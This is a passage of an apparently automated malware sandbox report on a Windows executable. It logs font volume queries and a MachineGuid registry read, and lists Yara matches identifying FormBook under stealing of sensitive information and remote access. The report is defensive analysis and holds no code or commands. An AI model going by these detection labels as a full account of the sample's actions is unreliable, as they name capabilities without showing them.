Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs